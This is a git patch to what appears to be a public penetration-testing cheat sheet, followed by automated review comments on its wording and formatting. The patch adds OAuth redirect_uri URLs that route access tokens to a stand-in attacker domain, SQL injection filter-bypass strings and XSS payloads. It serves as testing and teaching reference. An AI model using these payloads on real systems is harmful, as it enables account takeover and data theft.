From 07388503b02ef5a466fb988987e92e8dc096b243 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Sun, 4 Dec 2016 01:03:59 +0700 Subject: [PATCH] XSS,SQL OAuth Updated --- OAuth/README.md | 13 ++++++++++-- README.md | 7 ++----- SQL injection/MySQL Injection.md | 1 - SQL injection/README.md | 36 ++++++++++++++++++++++++++++++++ XSS injection/README.md | 8 ++++++- 5 files changed, 56 insertions(+), 9 deletions(-) diff --git a/OAuth/README.md b/OAuth/README.md index e3efb9c..6f77ecc 100644 --- a/OAuth/README.md +++ b/OAuth/README.md @@ -1,12 +1,20 @@ # OAuth 2 - Common vulnerabilities ## Grabbing OAuth Token via redirect_uri +Redirect to a controlled domain to get the access token ``` https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful -https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com -https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com ``` + +Redirect to an accepted Open URL in to get the access token +``` +https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com +https://www.example.com/oauth2/authorize?[...]&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fattacker%2F +``` +OAuth implementations should never whitelist entire domains, only a few URLs so that “redirect_uri” can’t be pointed to an Open Redirect. + + Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri: ``` https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com 
@@ -31,3 +39,4 @@ and SHOULD revoke (when possible) all tokens previously issued based on that aut * http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html * http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html * http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html +* http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html diff --git a/README.md b/README.md index abc1777..b2eb516 100644 --- a/README.md +++ b/README.md @@ -5,12 +5,9 @@ I <3 pull requests :) Last modifications : * XSS paylods improved -* Methodology added +* OAuth vulnerabilities added * AWS Bucket added - - -Extract nice bypass from https://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/ - +* SQL payloads updated # Tools diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 6515ee5..dcecf3d 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -40,7 +40,6 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1) AND MAKE_SET(YOLO LIMIT 1 OFFSET 0 +SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1). +``` + +Blacklist using keywords - bypass using uppercase/lowercase +``` +?id=1 AND 1=1# +?id=1 AnD 1=1# +?id=1 aNd 1=1# +``` + +Blacklist using keywords case insensitive - bypass using equivalent +``` +AND -> && +OR -> || += -> LIKE,REGEXP, not < and not > +WHERE -> HAVING +``` + + + + ## Thanks to - Other resources * MySQL: - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet) diff --git a/XSS injection/README.md b/XSS injection/README.md index 62a9e9f..c391143 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md 
@@ -113,6 +113,9 @@ java%0dscript:alert(1) - CR (\r) Using the escape character \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) +Using the newline and a comment // +javascript://%0Aalert(1) +javascript://anything%0D%0A%0D%0Awindow.alert(1) ``` XSS with data: @@ -121,7 +124,10 @@ data:text/html, data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ ``` - +XSS with vbscript: only IE +``` +vbscript:msgbox("XSS") +``` ## XSS in files XSS in XML ```
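Review bot: in the first OAuth/README.md hunk the new heading "Redirect to an accepted Open URL in to get the access token" is garbled and disagrees with the sentence two lines below it, which calls the same thing an Open Redirect; suggest `Redirect to an accepted Open Redirect URL to get the access token`. The mitigation sentence added after it would help more if it said what the check has to be: compare `redirect_uri` against an exact-match allowlist of complete URLs (scheme, host and path) rather than a domain suffix, because the `localhost.evil.com` line kept in the first block is exactly the case a suffix or substring match on the registered host lets through. Two smaller points: the curly quotes around “redirect_uri” should be plain backticks like the rest of the file, and the `redirect_uri=https://localhost` line is deleted with no rationale in the commit message; a word on why (it is not a remotely reachable destination, unlike the other two) would stop the next contributor from re-adding it.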
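Review bot: the reference appended at the end of OAuth/README.md (the andrisatteka.blogspot.ch post on Microsoft and Open Redirects) appears to be the source behind the new `oauth20_authorize.srf` example in the first hunk, but nothing ties the two together; cite it next to that example or give the bullet a one-line description, since the list is otherwise bare URLs and a reader cannot tell which link explains which case.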
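Review bot: the README.md hunk deletes the TODO "Extract nice bypass from https://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/" in the same commit that adds keyword-filter bypass notes to the SQL injection files; if those notes are drawn from that article, the URL belongs in the MySQL resources list under "## Thanks to - Other resources" rather than being dropped, so the source stays credited. The unchanged context line "* XSS paylods improved" has a typo (payloads) that could have been fixed while this list was being edited, and replacing "* Methodology added" with "* OAuth vulnerabilities added" reads as if the methodology entry was reverted; if both changes happened, keep both bullets.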
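Review bot: the extracted diff runs the `SQL injection/MySQL Injection.md` hunk (`@@ -40,7 +40,6 @@`, one line removed) straight into the block of `+` lines that the stat line attributes to `SQL injection/README.md` (36 insertions), and neither the removed `MAKE_SET` line nor a `diff --git a/SQL injection/README.md` header is visible, so the split between the two files cannot be checked from this view. On the added text itself: `= -> LIKE,REGEXP, not < and not >` is ambiguous as written; spell the last alternative out (`a = b` as `NOT (a < b) AND NOT (a > b)`) and space the list. `WHERE -> HAVING` needs a caveat that `HAVING` is not a drop-in replacement: it is evaluated on the result rows, so in MySQL it can only reference columns that appear in the `SELECT` list, `GROUP BY` columns or aggregates. The line `SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).` carries a trailing period inside a code fence, and four blank lines are left before `## Thanks to`. In the context line, `[PentestMonkey's mySQL injection cheat sheet] (http://...)` has a space between `]` and `(` that stops Markdown from rendering the link. Finally, the section would be more useful to a defender with one sentence stating what the three bypass blocks demonstrate: keyword blacklisting on input is not a fix for injection, parameterized queries are.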
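Review bot: the two new `javascript://` lines in XSS injection/README.md do not follow the annotation style of the entries just above them (`- CR (\r)`); label them `- LF (\n)` and `- CRLF (\r\n)` so the reader can see which encoded character terminates the `//` line comment, and rename the intro from "Using the newline and a comment //" to something like "Using a // comment ended by a newline", since the order matters: the comment must come first so that the decoded newline ends it and the code after it runs.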
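Review bot: the second XSS hunk replaces the blank line that separated the `data:` fence from `## XSS in files`, so the heading now sits directly on the closing fence; keep a blank line there like the rest of the file. The "only IE" qualifier should also say what it depends on (the `vbscript:` scheme is handled only by Internet Explorer's VBScript engine, so the payload is inert elsewhere) and use the same heading form as the neighbouring entry, e.g. `XSS with vbscript (Internet Explorer only):`.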